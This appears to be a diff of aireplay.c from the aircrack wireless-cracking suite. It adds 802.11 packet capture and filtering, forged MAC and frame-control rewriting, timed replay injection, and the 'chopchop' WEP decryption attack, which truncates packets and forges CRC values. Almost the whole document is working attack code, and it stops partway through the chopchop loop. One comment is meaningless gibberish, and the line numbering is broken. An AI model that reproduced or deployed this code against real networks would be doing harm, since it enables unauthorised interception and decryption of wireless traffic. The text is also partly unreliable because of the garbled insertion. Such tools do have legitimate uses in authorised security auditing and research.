1 diff -urN aircrack-2.1.orig/aireplay.c aircrack-2.1/aireplay.c
2 --- aircrack-2.1.orig/aireplay.c 2004-10-01 21:30:00.000000000 +0200
3 +++ aircrack-2.1/aireplay.c 2005-04-22 08:51:21.932065120 +0200
6 - * 802.11 WEP arp-requests replay attack
7 + * 802.11 WEP replay & injection attacks
9 - * Copyright (C) 2004 Christophe Devine
10 + * Copyright (C) 2004,2005 Christophe Devine
12 + * WEP decryption attack (chopchop) developped by KoreK
14 * This program is free software; you can redistribute it and/or modify
15 * it under the terms of the GNU General Public License as published by
17 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
20 +#include <sys/types.h>
21 #include <netpacket/packet.h>
22 +#include <linux/rtc.h>
23 #include <sys/ioctl.h>
24 +#include <sys/wait.h>
25 +#include <sys/stat.h>
26 #include <arpa/inet.h>
39 +#include "pcap-aireplay.h"
40 +#include "crctable.h"
42 +#define NULL_MAC "\x00\x00\x00\x00\x00\x00"
48 -#define BROADCAST_ADDR "\xFF\xFF\xFF\xFF\xFF\xFF"
49 +#ifndef ETH_P_80211_RAW
50 +#define ETH_P_80211_RAW 25
53 +#ifndef ARPHRD_IEEE80211
54 +#define ARPHRD_IEEE80211 801
57 +#ifndef ARPHRD_IEEE80211_PRISM
58 +#define ARPHRD_IEEE80211_PRISM 802
64 -" aireplay 2.1 - (C) 2004 Christophe Devine\n"
65 +" aireplay 2.2 - (C) 2004,2005 Christophe Devine\n"
67 +" usage: aireplay [options] <interface #0> [interface #1]\n"
69 -" usage: aireplay <wifi interface> <input filename> [bssid]\n"
70 +" interface #0 is for sending packets; it is also used to\n"
71 +" capture packets unless interface #1 is specified.\n"
75 +" -i : capture packet on-the-fly (default)\n"
76 +" -r file : extract packet from this pcap file\n"
80 +" -b bssid : MAC address, Access Point\n"
81 +" -d dmac : MAC address, Destination\n"
82 +" -s smac : MAC address, Source\n"
83 +" -m len : minimum packet length, default: 40\n"
84 +" -n len : maximum packet length, default: 512\n"
85 +" -u type : fc, type - default: 2 = data\n"
86 +" -v subt : fc, subtype - default: 0 = normal\n"
87 +" -t tods : fc, To DS bit - default: any\n"
88 +" -f fromds : fc, From DS bit - default: any\n"
89 +" -w iswep : fc, WEP bit - default: 1\n"
90 +" -y : assume yes & don't save packet\n"
94 +" -x nbpps : number of packets per second\n"
95 +" -a bssid : set Access Point MAC address\n"
96 +" -c dmac : set Destination MAC address\n"
97 +" -h smac : set Source MAC address\n"
98 +" -o fc0 : set frame control[0] (hex)\n"
99 +" -p fc1 : set frame control[1] (hex)\n"
100 +" -k : turn chopchop attack on\n"
103 -unsigned char buffer[65536];
108 - unsigned int length;
109 - unsigned char *data;
112 + unsigned char *s_file;
114 + unsigned char f_bssid[6];
115 + unsigned char f_smac[6];
116 + unsigned char f_dmac[6];
117 + int f_minlen, f_maxlen;
118 + int f_type, f_subtype;
119 + int f_fromds, f_tods, f_iswep;
122 + unsigned char r_bssid[6];
123 + unsigned char r_smac[6];
124 + unsigned char r_dmac[6];
125 + int r_fc_0, r_fc_1;
126 + int nbpps, do_chopchop;
129 +char *wlanng_dev = NULL;
133 @@ -60,295 +126,1370 @@
135 if( signum == SIGINT || signum == SIGTERM )
138 + if( signum == SIGALRM )
142 -int main( int argc, char *argv[] )
143 +/* CRC checksum verification routine */
145 +int check_crc_buf( unsigned char *buf, int len )
148 + unsigned long crc = 0xFFFFFFFF;
153 - int i, n, raw_sock;
154 - unsigned char *h80211;
155 - unsigned char bssid[6];
156 + for( ; len > 0; len--, buf++ )
157 + crc = crc_tbl[(crc ^ *buf) & 0xFF] ^ ( crc >> 8 );
159 + return( ~crc == *((unsigned long *) buf) );
162 +/* MAC address parsing routine */
164 +int getmac( char *s, unsigned char *mac )
168 + while( sscanf( s, "%x", &n ) == 1 )
170 + if( n < 0 || n > 255 )
175 + if( ++i == 6 ) break;
177 + if( ! ( s = strchr( s, ':' ) ) )
186 +/* interface initialization routine */
188 +int openraw( char *iface, int fd, int *arptype )
191 + struct packet_mreq mr;
192 struct sockaddr_ll sll;
193 - struct pcap_file_header pfh;
194 - struct pcap_pkthdr pkh;
197 + /* find the interface index */
199 - /* create the raw socket */
200 + memset( &ifr, 0, sizeof( ifr ) );
201 + strncpy( ifr.ifr_name, iface, sizeof( ifr.ifr_name ) - 1 );
203 - if( ( raw_sock = socket( PF_PACKET, SOCK_RAW,
204 - htons( ETH_P_ALL ) ) ) < 0 )
205 + if( ioctl( fd, SIOCGIFINDEX, &ifr ) < 0 )
207 - perror( "socket(PF_PACKET)" );
208 + perror( "ioctl(SIOCGIFINDEX)" );
212 - /* drop privileges */
213 + /* bind the raw socket to the interface */
215 - setuid( getuid() );
216 + memset( &sll, 0, sizeof( sll ) );
217 + sll.sll_family = AF_PACKET;
218 + sll.sll_ifindex = ifr.ifr_ifindex;
220 + sll.sll_protocol = htons( ETH_P_80211_RAW );
222 + sll.sll_protocol = htons( ETH_P_ALL );
224 - /* check the arguments */
225 + if( bind( fd, (struct sockaddr *) &sll,
226 + sizeof( sll ) ) < 0 )
228 + perror( "bind(ETH_P_ALL)" );
232 + /* lookup the hardware type */
234 - if( argc < 3 || argc > 4 )
235 + if( ioctl( fd, SIOCGIFHWADDR, &ifr ) < 0 )
239 + perror( "ioctl(SIOCGIFHWADDR)" );
244 + if( ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 &&
245 + ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM )
247 + fprintf( stderr, "unsupported hardware link type %d\n"
248 + "(expected ARPHRD_IEEE80211{,PRISM})\n",
249 + ifr.ifr_hwaddr.sa_family );
250 + fprintf( stderr, "make sure the interface is in Monitor mode\n" );
254 + *arptype = ifr.ifr_hwaddr.sa_family;
256 + /* enable promiscuous mode */
259 + memset( &mr, 0, sizeof( mr ) );
260 + mr.mr_ifindex = sll.sll_ifindex;
261 + mr.mr_type = PACKET_MR_PROMISC;
263 + if( setsockopt( fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP,
264 + &mr, sizeof( mr ) ) < 0 )
268 + perror( "setsockopt(PACKET_MR_PROMISC)" );
272 - while( sscanf( s, "%x", &n ) == 1 )
274 - if( n < 0 || n > 255 )
279 +/* wlanng-aware frame sending routing */
281 +unsigned char tmpbuf[4096];
284 +int send_frame( int fd, void *buf, size_t count )
288 + if( ( ((unsigned char *) buf)[0] & 3 ) != 3 )
290 + memcpy( tmpbuf, buf, 24 );
291 + memset( tmpbuf + 24, 0, 22 );
293 - if( ++i == 6 ) break;
294 + tmpbuf[30] = ( count - 24 ) & 0xFF;
295 + tmpbuf[31] = ( count - 24 ) >> 8;
297 - if( ! ( s = strchr( s, ':' ) ) )
299 + memcpy( tmpbuf + 46, buf + 24, count - 24 );
306 + memcpy( tmpbuf, buf, 30 );
307 + memset( tmpbuf + 30, 0, 16 );
309 + tmpbuf[30] = ( count - 30 ) & 0xFF;
310 + tmpbuf[31] = ( count - 30 ) >> 8;
312 - if( i != 6 ) goto usage;
313 + memcpy( tmpbuf + 46, buf + 30, count - 30 );
322 - if( argc - optind != 2 )
324 + return( write( fd, buf, count ) < 0 );
327 +int main( int argc, char *argv[] )
331 + int fd_rtc, caplen;
332 + int fd_in, arptype_in;
333 + int fd_out, arptype_out;
334 + int i_bssid, i_smac, i_dmac;
335 + int data_start, data_end;
336 + int guess, is_deauth_mode;
338 + unsigned long ticks[4];
339 + unsigned long crc_mask;
340 + unsigned long nb_pkt_read;
341 + unsigned long nb_pkt_sent;
345 + unsigned char buffer[4096];
346 + unsigned char *h80211;
347 + unsigned char *savebuf;
348 + unsigned char *chopped;
350 + FILE *f_cap_in = NULL;
351 + FILE *f_cap_out = NULL;
355 + struct options opt;
356 + struct pcap_file_header pfh;
357 + struct pcap_pkthdr pkh;
359 - if( strcmp( argv[optind], "wlan0ap" ) &&
360 - strcmp( argv[optind], "wlan1ap" ) &&
361 - strcmp( argv[optind], "wlan2ap" ) )
364 + /* create i/o raw sockets and open /dev/rtc */
366 + if( ( fd_in = socket( PF_PACKET, SOCK_RAW,
367 + htons( ETH_P_ALL ) ) ) < 0 )
369 - fprintf( stderr, "This program only works with HostAP's "
370 - "wlan#ap interface.\n" );
371 + perror( "socket(PF_PACKET)" );
375 - /* open the input file and check the pcap header */
377 - if( ( f_cap = fopen( argv[optind + 1], "rb" ) ) == NULL )
378 + if( ( fd_out = socket( PF_PACKET, SOCK_RAW,
379 + htons( ETH_P_ALL ) ) ) < 0 )
382 + perror( "socket(PF_PACKET)" );
386 - n = sizeof( struct pcap_file_header );
388 - if( fread( &pfh, 1, n, f_cap ) != (size_t) n )
389 + if( ( fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 )
391 - perror( "read(pcap header)" );
392 + perror( "open(/dev/rtc)" );
396 - if( pfh.magic != TCPDUMP_MAGIC )
397 + if( ioctl( fd_rtc, RTC_IRQP_SET, 4096 ) < 0 )
399 - fprintf( stderr, "wrong magic from pcap file header\n"
400 - "(got 0x%08X, expected 0x%08X)\n",
401 - pfh.magic, TCPDUMP_MAGIC );
402 + perror( "ioctl(RTC_IRQP_SET)" );
403 + printf( "Make sure you have enhanced rtc support in your kernel\n"
404 + "(module rtc) and that CONFIG_HPET_RTC_IRQ is disabled.\n" );
408 - if( pfh.linktype != LINKTYPE_IEEE802_11 &&
409 - pfh.linktype != LINKTYPE_PRISM_HEADER )
410 + if( ioctl( fd_rtc, RTC_PIE_ON, 0 ) < 0 )
412 - fprintf( stderr, "unsupported pcap header linktype %d\n",
414 + perror( "ioctl(RTC_PIE_ON)" );
418 - /* find the interface index */
419 + /* drop privileges */
421 - memset( &ifr, 0, sizeof( ifr ) );
422 - strncpy( ifr.ifr_name, argv[optind], sizeof( ifr.ifr_name ) - 1 );
423 + setuid( getuid() );
425 + /* check the arguments */
427 + memset( &opt, 0, sizeof( opt ) );
430 + opt.f_maxlen = 512;
439 - if( ioctl( raw_sock, SIOCGIFINDEX, &ifr ) < 0 )
442 - perror( "ioctl(SIOCGIFINDEX)" );
444 + int option = getopt( argc, argv,
445 + "ir:b:d:s:m:n:u:v:t:f:w:yx:a:c:h:o:p:k" );
447 + if( option < 0 ) break;
453 + case 'r' : if( opt.s_file != NULL )
455 + printf( "Packet source file already specified.\n" );
458 + opt.s_file = optarg;
461 + case 'b' : if( getmac( optarg, opt.f_bssid ) != 0 )
463 + printf( "Invalid AP MAC address.\n" );
468 + case 'd' : if( getmac( optarg, opt.f_dmac ) != 0 )
470 + printf( "Invalid destination MAC address.\n" );
475 + case 's' : if( getmac( optarg, opt.f_smac ) != 0 )
477 + printf( "Invalid source MAC address.\n" );
482 + case 'm' : sscanf( optarg, "%d", &opt.f_minlen );
483 + if( opt.f_minlen < 0 )
485 + printf( "Invalid minimum length filter.\n" );
490 + case 'n' : sscanf( optarg, "%d", &opt.f_maxlen );
491 + if( opt.f_maxlen < 0 )
493 + printf( "Invalid maximum length filter.\n" );
498 + case 'u' : sscanf( optarg, "%d", &opt.f_type );
499 + if( opt.f_type < 0 || opt.f_type > 3 )
501 + printf( "Invalid type filter.\n" );
506 + case 'v' : sscanf( optarg, "%d", &opt.f_subtype );
507 + if( opt.f_subtype < 0 || opt.f_subtype > 15 )
509 + printf( "Invalid subtype filter.\n" );
514 + case 't' : sscanf( optarg, "%d", &opt.f_tods );
515 + if( opt.f_tods != 0 && opt.f_tods != 1 )
517 + printf( "Invalid tods filter.\n" );
522 + case 'f' : sscanf( optarg, "%d", &opt.f_fromds );
523 + if( opt.f_fromds != 0 && opt.f_fromds != 1 )
525 + printf( "Invalid fromds filter.\n" );
530 + case 'w' : sscanf( optarg, "%d", &opt.f_iswep );
531 + if( opt.f_iswep != 0 && opt.f_iswep != 1 )
533 + printf( "Invalid wep filter.\n" );
538 + case 'y' : opt.assume_yes = 1; break;
540 + case 'x' : sscanf( optarg, "%d", &opt.nbpps );
541 + if( opt.nbpps < 1 || opt.nbpps > 4096 )
543 + printf( "Invalid number of packets per second.\n" );
548 + case 'a' : if( getmac( optarg, opt.r_bssid ) != 0 )
550 + printf( "Invalid AP MAC address.\n" );
555 + case 'c' : if( getmac( optarg, opt.r_dmac ) != 0 )
557 + printf( "Invalid destination MAC address.\n" );
562 + case 'h' : if( getmac( optarg, opt.r_smac ) != 0 )
564 + printf( "Invalid source MAC address.\n" );
569 + case 'o' : sscanf( optarg, "%x", &opt.r_fc_0 );
570 + if( opt.r_fc_0 < 0 || opt.r_fc_0 > 255 )
572 + printf( "Invalid frame control byte #0.\n" );
577 + case 'p' : sscanf( optarg, "%x", &opt.r_fc_1 );
578 + if( opt.r_fc_1 < 0 || opt.r_fc_1 > 255 )
580 + printf( "Invalid frame control byte #1.\n" );
585 + case 'k' : opt.do_chopchop = 1; break;
587 + default : goto usage; break;
591 - /* bind the raw socket to the interface */
592 + if( argc - optind < 1 || argc - optind > 2 )
599 - memset( &sll, 0, sizeof( sll ) );
600 - sll.sll_family = AF_PACKET;
601 - sll.sll_ifindex = ifr.ifr_ifindex;
602 - sll.sll_protocol = htons( ETH_P_ALL );
603 + if( opt.f_minlen > opt.f_maxlen )
605 + printf( "Invalid length filter (%d > %d).\n",
606 + opt.f_minlen, opt.f_maxlen );
610 - if( bind( raw_sock, (struct sockaddr *) &sll,
611 - sizeof( sll ) ) < 0 )
612 + if( opt.nbpps == 0 )
614 - perror( "bind(ETH_P_ALL)" );
616 + printf( "Option -x not specified, assuming %d.\n",
620 + if( memcmp( argv[optind], "wlan", 4 ) == 0 )
621 + wlanng_dev = argv[optind];
623 + if( openraw( argv[optind], fd_out, &arptype_out ) != 0 )
626 + /* open the packet source */
628 + if( argc - optind == 2 )
630 + if( openraw( argv[argc - 1], fd_in, &arptype_in ) != 0 )
636 + arptype_in = arptype_out;
639 + if( opt.s_file != NULL )
641 + if( ! ( f_cap_in = fopen( opt.s_file, "rb" ) ) )
647 + n = sizeof( struct pcap_file_header );
649 + if( fread( &pfh, 1, n, f_cap_in ) != (size_t) n )
651 + perror( "fread(pcap file header)" );
655 + if( pfh.magic != TCPDUMP_MAGIC &&
656 + pfh.magic != TCPDUMP_CIGAM )
658 + fprintf( stderr, "wrong magic from pcap file header\n" );
662 + if( pfh.magic == TCPDUMP_CIGAM )
663 + SWAP32(pfh.linktype);
665 + if( pfh.linktype != LINKTYPE_IEEE802_11 &&
666 + pfh.linktype != LINKTYPE_PRISM_HEADER )
668 + fprintf( stderr, "'%s' is not a 802.11 capture file.\n",
674 - signal( SIGINT, sighandler );
675 + /* look for replay-able packets */
677 - tm_prev = time( NULL );
678 + signal( SIGINT, sighandler );
679 + signal( SIGTERM, sighandler );
684 - /* search for potentially usable packets */
689 - if( do_exit ) break;
692 + printf( "exiting.\n" );
696 - if( time( NULL ) - tm_prev >= 1 )
697 + if( time( NULL ) - tt >= 1 )
699 - tm_prev = time( NULL );
700 - printf( "\r\33[1KRead %ld packets, got %ld "
701 - "potential ARP packets\r", cnt1, cnt2 );
703 + printf( "\rSeen %ld packets...\33[K", nb_pkt_read );
707 - /* read one packet */
711 + if( opt.s_file == NULL )
713 + /* capture one packet */
715 - if( fread( &pkh, 1, n, f_cap ) != (size_t) n )
718 + FD_SET( fd_in, &rfds );
720 - if( pkh.len != pkh.caplen )
726 + if( select( fd_in + 1, &rfds, NULL, NULL, NULL ) < 0 )
728 + if( errno == EINTR ) continue;
729 + perror( "select" );
733 - if( fread( buffer, 1, n, f_cap ) != (size_t) n )
735 + if( ! FD_ISSET( fd_in, &rfds ) )
739 + /* one packet available for reading */
742 + gettimeofday( &tv, NULL );
744 + memset( buffer, 0, 2048 );
746 - if( pfh.linktype == LINKTYPE_PRISM_HEADER )
747 + if( ( caplen = read( fd_in, buffer,
748 + sizeof( buffer ) ) ) < 0 )
754 + /* if device is an atheros, remove the FCS */
756 + if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
761 - /* remove the prism header if necessary */
762 + /* read one packet */
764 - n = *(int *)( h80211 + 4 );
767 - if( n < 8 || n >= (int) pkh.len )
768 + if( fread( &pkh, 1, n, f_cap_in ) != (size_t) n )
770 + printf( "\rSeen %ld packets...EOF.\n",
775 + if( pfh.magic == TCPDUMP_CIGAM )
776 + SWAP32( pkh.caplen );
778 + n = caplen = pkh.caplen;
780 + if( fread( buffer, 1, n, f_cap_in ) != (size_t) n )
782 + printf( "\rSeen %ld packets...EOF.\n",
790 + /* skip the prism header if present */
794 + if( ( opt.s_file == NULL && arptype_in == ARPHRD_IEEE80211_PRISM ) ||
795 + ( opt.s_file != NULL && pfh.linktype == LINKTYPE_PRISM_HEADER ) )
797 + n = *(int *)( buffer + 4 );
799 + if( n < 8 || n >= (int) caplen )
802 - h80211 += n; pkh.len -= n;
807 - /* check if it's an encrypted data packet */
810 + if( caplen < opt.f_minlen ||
811 + caplen > opt.f_maxlen ) continue;
813 - if( pkh.len < 40 ) continue;
814 + /* check the frame control bytes */
816 - if( ( h80211[0] & 0x0C ) != 0x08 ) continue;
817 - if( ( h80211[1] & 0x40 ) != 0x40 ) continue;
818 + if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) &&
819 + opt.f_type >= 0 ) continue;
821 - /* also check the BSSID and KeyID */
822 + if( ( h80211[0] & 0xF0 ) != ( opt.f_subtype << 4 ) &&
823 + opt.f_subtype >= 0 ) continue;
825 + if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) &&
826 + opt.f_tods >= 0 ) continue;
828 + if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) &&
829 + opt.f_fromds >= 0 ) continue;
831 + if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) &&
832 + opt.f_iswep >= 0 ) continue;
834 + /* check the extended IV (TKIP) flag */
836 + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
838 + if( opt.f_type == 2 && opt.f_iswep == 1 &&
839 + ( h80211[z + 3] & 0x20 ) != 0 ) continue;
841 + /* MAC address checking */
843 switch( h80211[1] & 3 )
845 - case 0: i = 16; break; /* DA, SA, (BSSID) */
846 - case 1: i = 4; break; /* (BSSID), SA, DA */
847 - case 2: i = 10; break; /* DA, (BSSID), SA */
848 - default: i = 4; break; /* (RA), TA, DA, SA */
849 + case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
850 + case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
851 + case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
852 + default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
855 - if( bssid_set == 0 )
856 + if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
857 + if( memcmp( h80211 + i_bssid, opt.f_bssid, 6 ) != 0 )
860 + if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 )
861 + if( memcmp( h80211 + i_smac, opt.f_smac, 6 ) != 0 )
864 + if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 )
865 + if( memcmp( h80211 + i_dmac, opt.f_dmac, 6 ) != 0 )
868 + /* this one looks good */
870 + printf( "\n\n Size: %d, FromDS: %d, ToDS: %d\n",
871 + caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
872 + printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n",
873 + h80211[i_bssid ], h80211[i_bssid + 1],
874 + h80211[i_bssid + 2], h80211[i_bssid + 3],
875 + h80211[i_bssid + 4], h80211[i_bssid + 5] );
876 + printf( " Src. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
877 + h80211[i_smac ], h80211[i_smac + 1],
878 + h80211[i_smac + 2], h80211[i_smac + 3],
879 + h80211[i_smac + 4], h80211[i_smac + 5] );
880 + printf( " Dst. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
881 + h80211[i_dmac ], h80211[i_dmac + 1],
882 + h80211[i_dmac + 2], h80211[i_dmac + 3],
883 + h80211[i_dmac + 4], h80211[i_dmac + 5] );
885 + /* Flurble gronk bloopit, bnip Frundletrune! */
887 + for( i = 0; i < caplen; i++ )
890 + if( ( i & 15 ) == 0 )
894 + printf( "\n --- CUT ---" );
898 + printf( "\n 0x%04x: ", i );
901 - memcpy( bssid, h80211 + i, 6 );
902 + printf( "%02x", h80211[i] );
904 + if( ( i & 1 ) != 0 )
907 + if( i == caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
909 + for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
912 + if( ( j & 1 ) != 0 )
918 + for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
919 + printf( "%c", ( h80211[i - 15 + j] < 32 ||
920 + h80211[i - 15 + j] > 126 )
921 + ? '.' : h80211[i - 15 + j] );
924 - printf( "\33[2KChoosing first encrypted BSSID"
925 - " = %02X:%02X:%02X:%02X:%02X:%02X\n",
926 - bssid[0], bssid[1], bssid[2],
927 - bssid[3], bssid[4], bssid[5] );
928 + if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
932 + for( j = 0; j < 16; j++ )
933 + printf( "%c", ( h80211[i - 15 + j] < 32 ||
934 + h80211[i - 15 + j] > 127 )
935 + ? '.' : h80211[i - 15 + j] );
939 - if( memcmp( bssid, h80211 + i, 6 ) )
942 - /* finally check the packet length & broadcast address */
945 - switch( h80211[1] & 3 )
946 + if( opt.assume_yes )
949 + printf( "Use this packet ? " );
952 + signal( SIGINT, SIG_DFL );
953 + scanf( "%s", tmp_str );
954 + signal( SIGINT, sighandler );
957 + if( tmp_str[0] == 'y' || tmp_str[0] == 'Y' )
961 + /* save the selected packet */
963 + pfh.magic = TCPDUMP_MAGIC;
964 + pfh.version_major = PCAP_VERSION_MAJOR;
965 + pfh.version_minor = PCAP_VERSION_MINOR;
968 + pfh.snaplen = 65535;
969 + pfh.linktype = LINKTYPE_IEEE802_11;
971 + pkh.tv_sec = tv.tv_sec;
972 + pkh.tv_usec = tv.tv_usec;
973 + pkh.caplen = caplen;
976 + lt = localtime( &tv.tv_sec );
978 + if( ! opt.assume_yes )
980 + sprintf( tmp_str, "replay_src-%02d%02d%02d-%02d%02d%02d.cap",
981 + lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
982 + lt->tm_hour, lt->tm_min, lt->tm_sec );
984 + printf( "Saving chosen packet in %s\n\n", tmp_str );
986 + n = sizeof( struct pcap_file_header );
988 + if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
990 - case 0: i = 4; break; /* (DA), SA, BSSID */
991 - case 1: i = 16; break; /* BSSID, SA, (DA) */
992 - case 2: i = 4; break; /* (DA), BSSID, SA */
993 - default: i = 16; break; /* RA, TA, (DA), SA */
994 + perror( "fopen(pcap output,wb+)" );
998 - if( pkh.len + ( h80211[27] & 0x3F ) != 0x44 ||
999 - memcmp( h80211 + i, BROADCAST_ADDR, 6 ) )
1001 + if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
1003 + perror( "fwrite(pcap file header)\n" );
1007 - /* ok, this packet may be replayed */
1008 + n = sizeof( pkh );
1010 - arp_packets[cnt2].length = pkh.len;
1011 + if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
1013 + perror( "fwrite(packet header)" );
1017 - arp_packets[cnt2].data = (unsigned char *)
1018 - malloc( pkh.len );
1021 - if( ! arp_packets[cnt2].data )
1022 + if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
1024 - perror( "malloc" );
1025 + perror( "fwrite(packet data)" );
1030 - memcpy( arp_packets[cnt2].data, buffer, pkh.len );
1031 + if( opt.do_chopchop ) goto do_chopchop;
1033 - if( cnt2++ >= (int) sizeof( arp_packets ) )
1035 + /* rewrite MAC addresses & frame control */
1037 + if( opt.r_fc_0 != -1 ) h80211[0] = opt.r_fc_0;
1038 + if( opt.r_fc_1 != -1 ) h80211[1] = opt.r_fc_1;
1040 + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1042 + switch( h80211[1] & 3 )
1044 + case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
1045 + case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
1046 + case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
1047 + default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
1050 + if( memcmp( opt.r_bssid, NULL_MAC, 6 ) != 0 )
1051 + memcpy( h80211 + i_bssid, opt.r_bssid, 6 );
1053 + if( memcmp( opt.r_smac, NULL_MAC, 6 ) != 0 )
1054 + memcpy( h80211 + i_smac, opt.r_smac, 6 );
1056 + if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
1057 + memcpy( h80211 + i_dmac, opt.r_dmac, 6 );
1059 + /* standard operation mode: loop resending the packet */
1061 + memset( ticks, 0, sizeof( ticks ) );
1069 + printf( "exiting.\n\n" );
1073 + /* wait for the next timer interrupt */
1075 + if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
1077 + perror( "\nread(/dev/rtc)" );
1085 + if( ticks[1] == 400 )
1088 + printf( "\rSent %ld packets...\33[K", nb_pkt_sent );
1092 + if( ( ticks[2] * opt.nbpps ) / 4096 < 1 )
1097 + if( send_frame( fd_out, h80211, caplen ) != 0 )
1099 + if( errno != EAGAIN )
1101 + perror( "write" );
1109 - printf( "\r\33[1KRead %ld packets, got %ld "
1110 - "potential ARP requests.\n", cnt1, cnt2 );
1113 + /* chopchop operation mode: truncate and decrypt the packet */
1114 + /* we assume the plaintext starts with AA AA 03 00 00 00 */
1118 + /* backup the packet */
1121 + if( ( savebuf = (unsigned char *) malloc( pkh.caplen ) ) == NULL )
1123 + perror( "malloc" );
1127 - /* now loop sending the ARP packets we've got */
1128 + memcpy( savebuf, h80211, pkh.caplen );
1131 + /* setup the chopping buffer */
1134 + n = pkh.caplen - z + 24;
1136 + if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
1138 - for( i = 0; i < cnt2; i++ )
1139 + perror( "malloc" );
1143 + memset( chopped, 0, n );
1145 + data_start = z + 4;
1146 + data_end = pkh.caplen;
1148 + chopped[0] = 0x08; /* normal data frame */
1149 + chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */
1151 + if( opt.r_fc_0 != -1 ) chopped[0] = opt.r_fc_0;
1152 + if( opt.r_fc_1 != -1 ) chopped[1] = opt.r_fc_1;
1154 + memcpy( chopped + 4, h80211 + i_bssid, 6 ); /* copy the BSSID */
1155 + memcpy( chopped + 24, h80211 + z, 4 ); /* copy the WEP IV */
1157 + /* setup the xor mask to hide the original data */
1161 + for( i = data_start; i < data_end - 4; i++ )
1163 + switch( i - data_start )
1165 - if( do_exit ) cnt2 = 0;
1166 + case 0: chopped[i] = 0xAA ^ 0xE0; break;
1167 + case 1: chopped[i] = 0xAA ^ 0xE0; break;
1168 + case 2: chopped[i] = 0x03 ^ 0x03; break;
1169 + default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
1172 + crc_mask = crc_tbl[crc_mask & 0xFF]
1173 + ^ ( crc_mask >> 8 )
1174 + ^ ( chopped[i] << 24 );
1177 + for( i = 0; i < 4; i++ )
1178 + crc_mask = crc_tbl[crc_mask & 0xFF]
1179 + ^ ( crc_mask >> 8 );
1181 + chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
1182 + chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
1183 + chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
1184 + chopped[data_end - 1] = crc_mask; crc_mask >>= 8;
1186 + for( i = data_start; i < data_end; i++ )
1187 + chopped[i] ^= savebuf[i];
1189 + data_start += 6; /* skip the SNAP header */
1191 + /* if the replay source mac is unspecified, forge one */
1193 + if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
1195 + is_deauth_mode = 1;
1197 + opt.r_smac[0] = 0x00;
1198 + opt.r_smac[1] = rand() & 0x3E;
1199 + opt.r_smac[2] = rand() & 0xFF;
1200 + opt.r_smac[3] = rand() & 0xFF;
1201 + opt.r_smac[4] = rand() & 0xFF;
1203 + memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
1207 + is_deauth_mode = 0;
1209 - if( time( NULL ) - tm_prev >= 1 )
1210 + opt.r_dmac[0] = 0xFF;
1211 + opt.r_dmac[1] = rand() & 0xFE;
1212 + opt.r_dmac[2] = rand() & 0xFF;
1213 + opt.r_dmac[3] = rand() & 0xFF;
1214 + opt.r_dmac[4] = rand() & 0xFF;
1217 + /* let's go chopping */
1219 + memset( ticks, 0, sizeof( ticks ) );
1224 + tt = time( NULL );
1230 + signal( SIGALRM, sighandler );
1232 + if( fcntl( fd_in, F_SETFL, O_NONBLOCK ) < 0 )
1234 + perror( "fcntl(O_NONBLOCK)" );
1238 + while( data_end > data_start )
1240 + if( do_exit == 1 )
1242 + printf( "exiting.\n\n" );
1246 + if( do_exit == 2 )
1248 + printf( "\n\nThe chopchop attack appears to have failed. "
1249 + "Possible reasons:\n\n * Something is wrong with "
1250 + "the driver or the wireless card itself.\n * You "
1251 + "are too far from the AP. Get closer or reduce the "
1254 + if( is_deauth_mode )
1255 + printf( "\n * The AP isn't vulnerable when operating in "
1256 + "non-authenticated mode.\n Run aireplay in "
1257 + "authenticated mode instead (-h option).\n\n" );
1259 + printf( "\n * The client MAC you have specified "
1260 + "is not currently authenticated."
1261 + "\n * The AP isn't vulnerable when operating in "
1262 + "authenticated mode.\n Run aireplay in non-"
1263 + "authenticated mode instead (no -h option).\n\n" );
1267 + /* wait for the next timer interrupt */
1269 + if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
1271 + perror( "read(/dev/rtc)" );
1275 + ticks[0]++; /* ticks since we entered the while loop */
1276 + ticks[1]++; /* ticks since the last status line update */
1277 + ticks[2]++; /* ticks since the last frame was sent */
